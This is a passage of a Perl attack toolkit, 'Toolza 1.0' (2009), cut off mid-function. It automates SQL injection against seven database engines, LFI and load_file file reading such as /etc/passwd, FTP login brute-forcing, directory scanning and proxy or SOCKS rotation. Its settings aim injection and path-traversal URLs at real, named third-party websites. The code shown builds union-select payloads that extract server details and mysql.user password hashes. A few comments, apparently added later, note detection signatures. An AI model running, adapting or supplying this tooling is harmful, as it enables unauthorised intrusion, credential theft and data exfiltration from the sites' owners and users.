  1. #!/usr/bin/perl - UTF-8 encoding
  2. use threads;
  3. use threads::shared;
  4. use IO::Socket;
  5. #use IO::Socket::SSL; # For enable HTTPS support uncomment this line
  6. my $num : shared;
  7. my $good : shared;
  8. my $ck1 : shared;
  9. ###########################################################################
  10. ## ?????????? ????????? ??? ???? ??????? | Global settings for all modes ##
  11. ###########################################################################
  12. $test_mode = 0;# when 1 - print get/post page content in terminal0
  13. $method = 0; # 1- Post; 0 - GET ????? ???????? | Post or Get method, 1-POST; 0-GET|||||SAFE POST - with $sql_post, line 27
  14. $get_method = 0; # 0 - via IO::Socket, 1 - via LWP::Simple -  if can't get DATA
  15. $use_proxy = 0; # 0 - ??? ??????; 1 - c ?????? | 1 -Use proxy; 0 - No proxy
  16. $proxy = "proxy.txt"; # ???? ? ???????? | Proxy file
  17. $use_socks = 0; # 0 - ??? socks; 1 - c socks | 1 -Use socks; 0 - No socks
  18. $socks_file = "socks.txt";# ???? ? SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
  19. $kol_threads = 10; # ???-?? ???????, ????????????? -10 | Number of threads - 10 recommended
  20. $timeout = 20; # ??????? ? ???????? | Timeout in seconds
  21. $cookie = 'PHPSESSID=qeqp01ccc006ra904qtaouoct0;b=b'; # ???? ??? ??? - ????????? "" | If no coockie set ""
  22. $https_mode_auth = 1; # 1 - whith authorization, 0 - no
  23. $https_auth_script_path = "/signin.php";
  24. $https_auth_post_data = "uname=qqq&passwd=123&Submit=Sign+In";
  25. $referer = "http://google.com"; # ???????, ???? ??? ????????? "" | If no referer set ""
  26. $user_agent = "Mozilla/5.0 (Windows NT 5.1; U; ru; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10"; # ???? ?????, ???? ??? ????????? "" | If no user agent set ""
  27. $sql_post = ""; # SQLi Post parameter
  28. #$sql_header = "Accept-Language: 1+and+1=1+or";# SQLi Header parametr (include COOKIE), if present before - comment it with "#"
  29. $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
  30. $pause = 0; # ????? ????? ????????? ? ???????? | Pause between requests in seconds
  31. #########################################################################################################################################
  32. ## ???????? ????????? MySQL - ?????? ?????????????? ???? ????????? " ^ " |MySql Basic options -  print " ^ " instead of printable field #
  33. #########################################################################################################################################
  34. $source_sql = "http://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=(1)and(0)union+select+1,2,3,^,5,6,7,8,9,10,11,12";
  35. $filtr = "--+"; # close SQL
  36. $plus = "+"; # /**/,%20,%2b & etc.
  37. $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
  38. $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
  39. $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
  40. $aes_key = "0x71"; # AES key
  41. ######################################
  42. ## MySql4 brute # URL = $source_sql ##
  43. ######################################
  44. $source_table_list = "source_table_list.txt"; # ????-??????? ??? ????? ?????? ? MySql4
  45. $source_column_list = "source_column_list.txt"; # ????-??????? ??? ????? ??????? ? MySql4
  46. ######################################
  47. ## Site Scanner for folders & files ##
  48. ######################################
  49. $scan_url = "site.com"; # ??? ????? ? ?????
  50. $folder_list = "scaner_folder_list.txt"; # ????-??????? ??? ??????? ?????/??????
  51. $error_list = "scaner_errors_list.txt"; # ???? c ???????? ??????? ??????? ??? ???????????? ??????? ?????/?????
  52. ###################################
  53. ## LFI/READER/Load_file() bruter ##
  54. ##########################################################################################################
  55. # LFI/READER/Load_file, ?tc/passwd ???????? ?? " ^ " , ??? ? ? load_file('/etc/passwd') = load_file('/^')#
  56. # ??? ? load_file(0x2f6574632f706173737764) = load_file(^)                                               #
  57. ##########################################################################################################
  58. $lrl_url = "http://dominionpropertymanagement.com/index.php?option=com_propiedades&controller=../../../../../../../../../../../^%00";
  59. $lrl_error_message = "require_once"; # ??????? (????? ???????), ??????? ?????, ???? ?????? ???????????? ??????|Message when wrong
  60. $lrl_list = "logs.txt"; # ????-??????? ??? ??????? ?????/?????? | File with paths/files
  61. ################################################################################
  62. ## Blind SQL-injection ????????? - ??????? +and+mid(version(),1,1)=5--+ ##
  63. ################################################################################
  64. $bl_mode = 1; # mode of blind sql injection:
  65. #-----------------------------------------------------------------------------------------------------------------
  66. # mode 0 example - http://site.com/index.php?id=1+and+mid(version(),1,1)=5--+
  67. #in script:
  68. #$bl_url = "http://site.com/index.php?id=1";
  69. #$bl_filtr = "--+";
  70. #$bl_plus = "+";
  71. #$bl_error = "here_wrong_message";
  72. #$bl_error_type = 0;
  73. #-----------------------------------------------------------------------------------------------------------------
  74. # mode 1 example - http://site.com/index.php?id=1+and+1=if((select+mid(version(),1,1)=5),1,(select+1+union+select+2))
  75. #in script:
  76. #$bl_url = "http://site.com/index.php?id=1+and+1=if((select";
  77. #$bl_filtr = "),1,(select+1+union+select+2))";
  78. #$bl_plus = "+";
  79. #$bl_error = "here_wrong_message";
  80. #$bl_error_type = 0;
  81. #-----------------------------------------------------------------------------------------------------------------
  82. $bl_url = "http://www.flygo.ru/1'or"; # url
  83. $bl_filtr = "--'"; # close SQL
  84. $bl_plus = "+"; # /**/,%20,%2b & etc.
  85. $bl_error = '???????'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  86. #$bl_error = 'height="45"'; # ????? ????????????? ???????????/????????????? ??????? | Message when wrong/right query
  87. $bl_error_type = 0; # ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  88. $bl_your_query = ""; #example - concat_ws(0x3a,table_schema,table_name)
  89. $bl_from = "";#without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+like+0x7573657273
  90. ##################################################################################
  91. ## NAME_CONST Blind SQL-injection ????????? - ???????? version() ??? ???? ?? "^"##
  92. ##################################################################################
  93. $nc_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(^,0x3a,@:=@-1))--+^"; # url
  94. $nc_plus = "+"; # /**/,%20,%2b & etc.
  95. #############################################################
  96. ## ???????? ????????? MySQL injection column number bruter ##
  97. #############################################################
  98. $source_sql_c = "http://site.com/more.php?pid=4847+or+1=1";# url
  99. $filtr_c = "--+"; # close SQL
  100. $plus_c = "+"; # /**/,%20,%2b & etc.
  101. $sql_mess = "on line 28";# ????? ????????????? ???????????/????????????? ??????? | Message when wrong number of columns
  102. $sql_mess_type = 0;# ??? ?????? ??????????????, 1 - ????? ?????? ??????????, 0 - ????? ?????? ???????????? | Type of message: 1 - when right query, 0 - when wrong query
  103. $sql_max_column_number = 120; # Max column number for brute
  104. #############################################################################################
  105. ##            FTP checker                                                                  ##
  106. #############################################################################################
  107. $ftp_list = "ftp.txt"; # file with unchecked ftp
  108. $ftp_save = "ftp_good.txt"; # file with checked & good ftp
  109. $ftp_def_port = 21; # default ftp port
  110. #############################################################################################
  111. ##            FTP bruter                                                                   ##
  112. #############################################################################################
  113. $ftp_host = "ftp.example.com"; # ftp host
  114. $ftp_def_port_b = 21; # default ftp port
  115. $ftp_login = ""; # when know login, passwords brute
  116. $ftp_pass_file = "ftp_pass.txt"; # when know login, passwords brute
  117. $ftp_pass = ""; # when know password, logins brute
  118. $ftp_login_file = "ftp_login.txt"; # when know password, logins brute
  119. $ftp_login_pass_file = "ftp_login_pass.txt"; # login:password brute
  120. $ftp_login_pass_del = ":"; # login:password delimetr (:|; & etc)
  121. #############################################################################################
  122. ##            PROXY checker                                                                ##
  123. #############################################################################################
  124. $proxy_list = "proxy.txt"; # unchecked proxy file
  125. $proxy_save = "proxy_good.txt"; # checked & good proxy file
  126. #############################################################################################
  127. ##            PROXY grabber                                                                ##
  128. #############################################################################################
  129. $proxy_site_list = "proxy_site_list.txt"; # file with sites with free proxy
  130. #############################################################################################
  131. ##            MSSQL injection                                                              ##
  132. #############################################################################################
  133. $ms_url = "http://site.com/showSubcategories.aspx?categoryid=1%20or%201="; # url
  134. $ms_spase = "/**/"; #%20,%2b & etc.
  135. $ms_close = ""; #close SQL
  136. $ms_convert_in = 0; # 0 - don't use convert(int,(data)), 1 - use convert(int,(data))
  137. ######################################################################################################################
  138. ## PostgreSQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field #
  139. ######################################################################################################################
  140. $p_union_select_url = "http://example.com/index.php?id=-5+null,^,null"; # url UNION+SELECT method
  141. $p_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  142. $p_method = 0; # 0 - UNION+SELECT method, 1 - SUBQUERY method
  143. $p_filtr = "--+"; # close SQL
  144. $p_plus = "+"; # %20,%2b & etc.
  145. $p_convert = "text"; # convert data type(text,int ... etc.) - for subquery method
  146. #####################################################################################################
  147. ##          Sybase SQL                                                                             ##
  148. #####################################################################################################
  149. $s_union_select_url = "http://example.com/index.php?id=-1+union+select+null,^,null"; # url UNION+SELECT method
  150. $s_subquery_url = "http://example.com/index.php?id=-5"; # url SUBQUERY method
  151. $s_method = 0;# 0 - UNION+SELECT method, 1 - SUBQUERY method
  152. $s_filtr = "--+"; # close SQL
  153. $s_plus = "+"; # /**/,%20,%2b & etc.
  154. $s_convert = "numeric"; # default type to convert - numeric (for subquery method)
  155. #####################################################################################################
  156. ##          Ms Access & Jet SQL                                                                    ##
  157. #####################################################################################################
  158. $a_source_sql = "http://site.com/?l=news&o=display&page=&idx=317"; # url
  159. $a_filtr = ""; # close SQL
  160. $a_plus = "+"; # %20,%2b & etc.
  161. $a_error_code_column_more = "80040e14"; # method ORDER BY - error code when column number is MORE
  162. $a_error_code_table = "80040e37"; # error code when wrong table
  163. $a_error_code_column = "80040e10"; # error code when wrong column
  164. $a_max_column_number = 100; # max column number for brute
  165. #######################################################################################################################
  166. ## Oracle SQL - ?????? ?????????????? ???? ????????? " ^ " | Basic options -  print " ^ " instead of printable field ##
  167. #######################################################################################################################
  168. $o_source_sql = "http://example.com/index.php?id=-5+null,^,null"; # url
  169. $o_filtr = "--+"; # close SQL
  170. $o_plus = "+"; # %20,%2b & etc.
  171. $o_convert = "char"; # default type to convert printable field - char
  172. #######################################################################################################################
  173. ## Firebird/Interbase SQL##
  174. #######################################################################################################################
  175. $fi_source_sql = "http://example.com/image.php?operator=2)+and+1="; # url http://example.com/image.php?operator=2)+and+1=cast(user+as+char(777))--
  176. $fi_filtr = "--"; # close SQL
  177. $fi_plus = "+"; # %20,%2b & etc.
  178. $fi_convert = "char(777)"; # default data type - char(777)
  179. #####################################################################################################
  180. ## floor(rand()) MySQL## example: http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+ # Blind SQL inj alternative
  181. #######################################################################################################################
  182. $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here
  183. $f_url = "http://www.montserrat.edu/galleries/montserrat/index.php?id=(1)or(select(1)from"; # url
  184. $f_plus = "+"; # %20,%2b & etc.
  185. $f_filtr = "--"; # close SQL
  186. #####################################################################################################
  187. ## ???? ?????? ?? ???????, ???? ?? ?????, ??? ?????? | Don't touch anything below if you don't know what you do ##
  188. ##################################################################################################################  #####################################################################################################
  189. if ($method == 1) {
  190.      $method = "POST";
  191. } else {
  192.      $method = "GET";
  193. }
  194. $search="+";
  195. $replacement=" ";
  196. sub collect {
  197.  my $datass = $_[0];
  198.  my $cookies = undef;
  199.  while($datass =~ /Set-Cookie: (.+?)(;|\r)/igs){
  200.    $cookies .= $1."; ";
  201.  }
  202.  return $cookies;
  203. }
  204. sub req {
  205.  my($hosts, $paths, $types, $datas, $cookiess) = @_;
  206.  my $https_sock = IO::Socket::SSL->new("$hosts:443");
  207.  my $request = "$types $paths HTTP/1.1\n".
  208.  "Host: $hosts\n".
  209.  "Cookie: $cookiess\n";
  210.  if($types eq "POST") {
  211.      $request .= "Content-type: application/x-www-form-urlencoded\n".
  212.      "Content-Length: ".length($datas)."\n\n".$datas;
  213.  } else {
  214.      $request .= "\n";
  215.  }
  216.  print $https_sock $request;
  217.  my $answ = undef;
  218.  while(my $buf = <$https_sock>) {
  219.      $answ .= $buf;
  220.  }
  221.  return $answ;
  222. }
  223. $socks_check = 0;
  224. $https_flag = 0;
  225. $https_auth_check = 0;
  226. $sql_data_flag = false;
  227. my ($CRLF,$port4,$login,$pass,$sock_res);
  228. $CRLF = "\015\012";
  229. ($lrl_start, $lrl_end) = split (/\^/, $lrl_url);
  230. $lrl_url =~ /^http:\/\/?([^\/]+)/i;
  231. $host2 = $1;
  232. $bl_url =~ /^http:\/\/?([^\/]+)/i;
  233. $host3 = $1;
  234. $lrl_url = $lrl_start . "[BRUTE]" . $lrl_end;
  235. $f_url =~ /^http:\/\/?([^\/]+)/i;
  236. $host13 = $1; # floor
  237. $scan_url =~ /^http:\/\/?([^\/]+)/i;
  238. $host1 = $1;
  239. $source_sql_c =~ /^http:\/\/?([^\/]+)/i;
  240. $host5 = $1;
  241. ($nc_start,$nc_midle,$nc_end) = split(/\^/,$nc_url);
  242. $nc_url =~ /^http:\/\/?([^\/]+)/i;
  243. $host6 = $1;
  244. #--- default paterns ----#
  245. $ms_pattern_sys_tab = "Syntax error converting the .* value \'(.*)\' to a column of data type"; # regular expression to parse sys & tables
  246. $ms_pattern_sys_tab1 = "Conversion failed when converting the .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  247. $ms_pattern_columns = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse columns from tables
  248. $ms_pattern_columns1 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  249. $ms_pattern_data1   = "Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.1
  250. $ms_pattern_data2   = "[SQL Server]Syntax error converting the .* value \'(.*)\' to a column of data type";# regular expression to parse DATA from columns v.2
  251. $ms_pattern_data3 = "Conversion failed when converting .* value \'(.*)\' to data type"; # regular expression to parse sys & tables
  252. $ms_url =~ /^http:\/\/?([^\/]+)/i;
  253. $host7 = $1;
  254. if ($p_method == 0) {
  255.     ($p_sql_start, $p_sql_end) = split (/\^/, $p_union_select_url);
  256.     $p_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  257.     $host8 = $1;
  258. }
  259. if ($p_method == 1) {
  260.     $p_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  261.     $host8 = $1;
  262. }
  263. if ($s_method == 0) {
  264.     ($ss_sql_start, $ss_sql_end) = split (/\^/, $s_union_select_url);
  265.     $s_union_select_url =~ /^http:\/\/?([^\/]+)/i;
  266.     $host9 = $1;
  267. }
  268. if ($s_method == 1) {
  269.     $s_subquery_url =~ /^http:\/\/?([^\/]+)/i;
  270.     $host9 = $1;
  271. }
  272. $p_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  273. $p_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  274. $s_sql_pref1 = "0x75737372||"; # ?? ????????
  275. $s_sql_pref2 = "||0x75737372"; # ?? ????????
  276. $a_source_sql =~ /^http:\/\/?([^\/]+)/i;
  277. $host10 = $1;
  278. $a_sql_pref1 = "chr(94)%2b"; # ?? ????????
  279. $a_sql_pref2 = "%2bchr(94)"; # ?? ????????
  280. ($o_sql_start, $o_sql_end) = split (/\^/, $o_source_sql);
  281. $o_source_sql =~ /^http:\/\/?([^\/]+)/i;
  282. $host11 = $1;
  283. $o_sql_pref1 = "chr(117)||chr(115)||chr(115)||chr(114)||"; # ?? ????????
  284. $o_sql_pref2 = "||chr(117)||chr(115)||chr(115)||chr(114)"; # ?? ????????
  285. $fi_source_sql =~ /^http:\/\/?([^\/]+)/i;
  286. $host12 = $1;
  287. $fi_sql_pref1 = 'ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)||'; # ?? ????????
  288. $fi_sql_pref2 = '||ascii_char(117)||ascii_char(115)||ascii_char(115)||ascii_char(114)'; # ?? ????????
  289. print "-----------------------------------------\n";
  290. $sql_pref1 = "CONCAT(0x75737372,"; # ?? ????????
  291. $sql_pref2 = ",0x75737372)"; # ?? ????????
  292. if ($aes == 1) {
  293.      $sql_CP_start =  "AES_DECRYPT(AES_ENCRYPT(";
  294.      $sql_CP_end = "," . $aes_key . ")," . $aes_key . ")";
  295. }
  296. if ($unhex == 1) {
  297.      $sql_CP_start =  "UNHEX(HEX(";
  298.      $sql_CP_end = "))";
  299. }
  300. if (($aes == 0) && ($unhex == 0)) {
  301.      $sql_CP_start =  "";
  302.      $sql_CP_end = "";
  303. }
  304. if ($limit == 0) {
  305.      $limit =  "";
  306. }
  307. if ($limit == 1) {
  308.      $limit =  $plus . "limit" . $plus . "0,1";
  309. }
  310. if ($limit == 2) {
  311.      $limit =  $plus . "limit" . $plus . "1,1";
  312. }
  313. if ($use_proxy == 1) {
  314.    print "----------------------------------------\n";
  315.    print "You choose mode with proxy, try to find good in $proxy ...\n";
  316.    print "Timeout = $timeout sec:\n";
  317.    print "----------------------------------------\n";
  318.    $proxy_flag = 0;
  319.    open(FILE9, "<", $proxy);
  320.    while(<FILE9>) {
  321.          chomp;
  322.          push(@prox, $_);
  323.    }
  324.    close(FILE9);
  325.    $size = @prox;
  326.    $i = 0;
  327.    while ($i < $size) {
  328.       $current_proxy = $prox[$i];
  329.       ($current_proxy_host,$current_proxy_port) = split(/:/,$current_proxy);
  330.       if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  331.            print "Will use --> $current_proxy_host:$current_proxy_port\n";
  332.            $proxy_flag = 1;
  333.            $proxy_message = "$current_proxy_host:$current_proxy_port";
  334.            $i = $size;
  335.       } else {
  336.            print "$current_proxy_host:$current_proxy_port - Bad proxy\n";
  337.       }
  338.       $i++;
  339.    }
  340.    if ($proxy_flag == 0) {
  341.         print "----------------------------------------\n";
  342.         print "No good proxy in " . $proxy . ", change mode. Exit...\n";
  343.         exit;
  344.    }
  345. } else {
  346.    $proxy_message = "no";
  347. }
  348. $flag_check = 0;
  349. print "-----------------------------------------\n";
  350. print "Toolza 1.0 by Pashkela [ BugTrack Team ] (c) 2009\n";
  351. START_global:
  352. if ($get_method == 1) {
  353.      print "------------------------------------------------------------------------------\n";
  354.      print "===================> Only GET-method, no proxy, no socks! <===================\n";
  355.      print "------------------------------------------------------------------------------\n";
  356. }
  357. print "----------------------------------------------------------\n";
  358. print "               Choose mode:\n";
  359. print "----------------------------------------------------------\n";
  360. print "    [1]  Mysql injection\n";
  361. print "    [2]  MSSQL injection\n";
  362. print "    [3]  PostgreSQL injection\n";
  363. print "    [4]  Sybase SQL injection\n";
  364. print "    [5]  Access & Jet SQL injection\n";
  365. print "    [6]  Oracle SQL injection\n";
  366. print "    [7]  Firebird/Interbase SQL injection\n";
  367. print "    =======================================================\n";
  368. print "    [8]  LFI/Reader/Load_file() bruter\n";
  369. print "    [9]  Scan site for folders & files\n";
  370. print "    [10] FTP checker\n";
  371. print "    [11] FTP bruter\n";
  372. print "    [12] Proxy checker\n";
  373. print "    [13] Proxy grabber\n";
  374. print "    =======================================================\n";
  375. print "    [14] Exit\n";
  376. print "----------------------------------------------------------\n";
  377. if($sql_post and !$sql_header){
  378.    $method = "POST";
  379.    $sql_flag = 1;  
  380.    print "SQLi in POST parameter...\n";
  381.   ($sql_start, $sql_end) = split (/\^/, $sql_post);
  382.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  383.    $host100 = $1; # source_sql host
  384. }elsif(!$sql_post and $sql_header){      
  385.    $sql_flag = 2;  
  386.    print "SQLi in HEADER parameter...\n";
  387.    $sql_header =~ s!\Q$search!$replacement!g;
  388.    ($sql_start, $sql_end) = split (/\^/, $sql_header);
  389.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  390.    $host100 = $1; # source_sql host
  391. }elsif($sql_post and $sql_header){
  392.    print "==========================================================================\n";
  393.    print "SQLi in HEADER parameter[\$sql_post] and in POST parametr[\$sql_header]\n";
  394.    print "in \"Global settings\" section - don't supported, choose one, exit...\n";
  395.    print "==========================================================================\n";
  396.    exit;          
  397. }else{
  398.    print "SQLi in GET parameter...\n";
  399.    $sql_flag = 0;  
  400.    ($sql_start, $sql_end) = split (/\^/, $source_sql);
  401.    $source_sql =~ /^http:\/\/?([^\/]+)/i;
  402.    $host100 = $1; # source_sql host
  403. }
  404. $choice = <STDIN>;
  405. chomp $choice;
  406. print "Your choice: $choice\n";
  407. ## Mysql ###############################################################################################################
  408. if ($choice == 1) {
  409. START:
  410. if ($source_sql =~ m/^https:\/\/?([^\/]+)/i) {
  411.    $host100 = $1;
  412.    $https_flag = 1;
  413.    print "----------------------\n";
  414.    print "HTTPS mode enabled\n";
  415.    print "----------------------\n";
  416. }
  417. $host = $host100;
  418. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  419.     print "-----------------------------------------\n";
  420.     print "Authorization required, wait please....";
  421.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  422.     $ck1 = collect($answ1);
  423.     $https_auth_check = 1;
  424.  
  425.     print " DONE\n";
  426.     print "-----------------------------------------\n";
  427. }
  428. sub ascii_to_hex($) {
  429.  
  430.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  431.                $str = "0x" . $str;
  432.              return $str;
  433.     }
  434. if ($use_socks == 1 && $socks_check == 0) {
  435.   $check_url = $host;
  436.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  437.            . "Host: $check_host\r\n"
  438.            . "Referer: http://" . $check_url . "\r\n"
  439.            . "Accept: */*\r\n"
  440.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  441.            . "Connection: close\r\n\r\n";
  442.    print "----------------------------------------\n";
  443.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  444.    print "Timeout = 5 sec:\n";
  445.    print "----------------------------------------\n";
  446.    $socks_check = 0;
  447.    $check_socks = socks_check();
  448.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  449.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  450.   if ($current_proxy_host) {
  451.      $socks_check = 1;
  452.      print "Will use --> $proxy_message\n";
  453.   } else {
  454.      $socks_check = 0;
  455.      $proxy_message = "No";
  456.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  457.   }
  458. }
  459. print "----------------------------------------------------------\n";
  460. print "               Choose mode:\n";
  461. print "----------------------------------------------------------\n";
  462. print "    [1]  Mysql inj system information\n";
  463. print "    [2]  Mysql inj get DB-names from information_schema.schemata\n";
  464. print "    [3]  Mysql inj get tables from DB-name\n";
  465. print "    [4]  Mysql inj get column_name from tables from DB-name\n";
  466. print "    [5]  Mysql inj get tables from information_schema (current DB)\n";
  467. print "    [6]  Mysql inj get column_name from table (current DB)\n";
  468. print "    [7]  Mysql inj get data from columns\n";
  469. print "    [8]  Mysql inj brute tables & columns\n";
  470. print "    [9]  Mysql inj column number bruter\n";
  471. print "    [10] Mysql inj Blind\n";
  472. print "    [11] Mysql inj NAME_CONST\n";
  473. print "    [12] Mysql inj floor(rand())\n";
  474. print "    [13] Mysql inj LOAD_FILE (file_priv = Y)\n";
  475. print "----------------------------------------------------------\n";
  476. print "    [14]  Main menu\n";
  477. print "----------------------------------------------------------\n";
  478. $choice = <STDIN>;
  479. chomp $choice;
  480. print "Your choice: $choice\n";
  481. if ($choice == 1) {
  482.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  483.      if ($flag_check == 0) {
  484.            $url0 = $sql_start . $sql_CP_start . "SQL" . $sql_CP_end . $sql_end . $limit . $filtr;
  485.            $flag_check = 1;
  486.            print "-----------------------------------------\n";
  487.            print "Check basic options:\n";
  488.            print "-------------------\n";
  489.            print "$url0\n";
  490.            print FILE "$url0\n";
  491.      }
  492.      #### ?????? ?????? #####################################################
  493.      $url1 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  494.      #### ?????? ??? ???? #####################################################
  495.      $url2 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  496.      #### ?????? ????? #####################################################
  497.      $url3 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x757365723a,user())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  498.      #### ?????? @@basedir #####################################################
  499.      $url4 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  500.      #### ?????? @@datadir #####################################################
  501.      $url5 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  502.      #### ?????? @@tmpdir #####################################################
  503.      $url6 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  504.      #### ?????? @@version_compile_os #####################################################
  505.      $url7 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  506.      #### ?????? mysql.user #####################################################
  507.      $url8 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  508.      #### ?????? mysql.password #####################################################
  509.      $url9 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "mysql.user" . $limit . $filtr;
  510.      #### ?????? file_priv #####################################################
  511.      $url10 = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . "mysql.user" . $plus . "where" . $plus . "user=user" . $limit . $filtr;
  512.      #####################################################################
  513.      $thr = $kol_threads; # ???-?? ???????
  514.      $num = -1; # ?? ????????
  515.      print "-----------------------------------------\n";
  516.      print "System information:\n";
  517.      print "-----------------------------------------\n";
  518.      print FILE  "-----------------------------------------\n";
  519.      print FILE  "HOST: $host\n";
  520.      print FILE "-----------------------------------------\n";
  521.      print FILE "System information:\n";
  522.      print FILE "-----------------------------------------\n";
  523.      print "Request method - $method\n";
  524.      print "Threads - $kol_threads\n";
  525.      print "Proxy - $proxy_message\n";
  526.      print "----------------------\n";
  527.      for(0..$thr) {
  528.         $trl[$_] = threads->create(\&gets1);
  529.      }
  530.      for(0..$thr) {
  531.         $trl[$_]->join;
  532.      }
  533.      sub gets1 {
               # Worker body for the "system information" mode (the enclosing
               # if-block starts above this chunk).  Every thread created by the
               # loop above runs this; the shared counter $num hands out the next
               # index into @array so each query is sent exactly once.
  534.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  535.         $size = @array; # number of queued queries
  536.         $| = 1; # unbuffered STDOUT so the "\r" progress counter shows immediately
  537.         while ($num<$size) {
  538.             { lock($num);
  539.             $num++; } # the increment is the only operation done under the lock
  540.             if($sql_flag == 0){ # 0: the query rides in the request URL
  541.               $current = $array[$num];
  542.               $content = scan_url();
  543.             } elsif ($sql_flag == 1) {#POST: the query is sent as the body via $sql_post
  544.               $current = $source_sql;
  545.               $sql_post = $array[$num];
  546.               $content = scan_url_POST();
  547.             } elsif($sql_flag == 2){#HEADER: the query is placed in an HTTP header
  548.               $current = $source_sql;
  549.               $sql_header_query = $array[$num];
  550.               $sql_header_query =~ s!\Q$search!$replacement!g; # literal $search -> $replacement (both set elsewhere in the file)
  551.               $content = scan_url_HEADER();
  552.             }
  553.             if ($content =~ m/ussr(.*?)ussr/imgs) {
                   # The payload wraps the extracted value in the fixed literal "ussr";
                   # that marker therefore appears in every response this tool reads
                   # and is a stable string for WAF/IDS rules to match on.
  554.                   print $1 . "\n";
  555.                   print FILE $1 . "\n";
  556.             }
  557.             print $num . "\r";
  558.             sleep $pause;
  559.         }
  560.      }
  561.      print "----------\n";
  562.      print "Saved in " . "z_" . $host . ".txt\n";
  563.      close(FILE);
  564.      goto START;
  565. }
  566. #### ??????? ?? ##################################################################################################
  567. if ($choice == 2) {
       # Mode 2: enumerate database names.  The number of rows in
       # information_schema.schemata is fetched first; then the worker threads
       # (gets5050) retrieve one schema_name per request with "limit N,1",
       # coordinating through the shared counter $num.  Output is printed and
       # appended to z_<host>.txt.
       #
       # Detection note: this yields a burst of near-identical requests from
       # several threads differing only in the LIMIT offset, each referencing
       # information_schema, with the fixed "ussr" marker in the response.
  568.      open( FILE, ">>" . "z_" .$host . ".txt" ); # append-mode results log for this host
  569.      ## number of DBs in information_schema.schemata ##
  570.      $url11 = $sql_start . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.schemata" . $limit . $filtr; # the count query
  571.      if($sql_flag == 0){ # 0: the query rides in the request URL
  572.          $current = $url11;
  573.          $content = scan_url();
